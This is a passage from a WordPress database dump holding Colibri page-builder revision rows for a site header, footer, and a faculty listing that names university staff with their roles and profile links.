}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 09:22:06','2023-10-13 13:22:06','',26,'https://gsudice.dataconn.net/?p=1722',0,'revision','',0),(1723,1,'2023-10-13 09:22:06','2023-10-13 13:22:06','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 09:22:06','2023-10-13 13:22:06','',25,'https://gsudice.dataconn.net/?p=1723',0,'revision','',0),(1724,1,'2023-10-13 09:22:06','2023-10-13 13:22:06','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 09:22:06','2023-10-13 13:22:06','',29,'https://gsudice.dataconn.net/?p=1724',0,'revision','',0),(1725,1,'2023-10-13 09:22:06','2023-10-13 13:22:06','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 09:22:06','2023-10-13 13:22:06','',28,'https://gsudice.dataconn.net/?p=1725',0,'revision','',0),(1727,1,'2023-10-13 09:59:38','2023-10-13 13:59:38','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 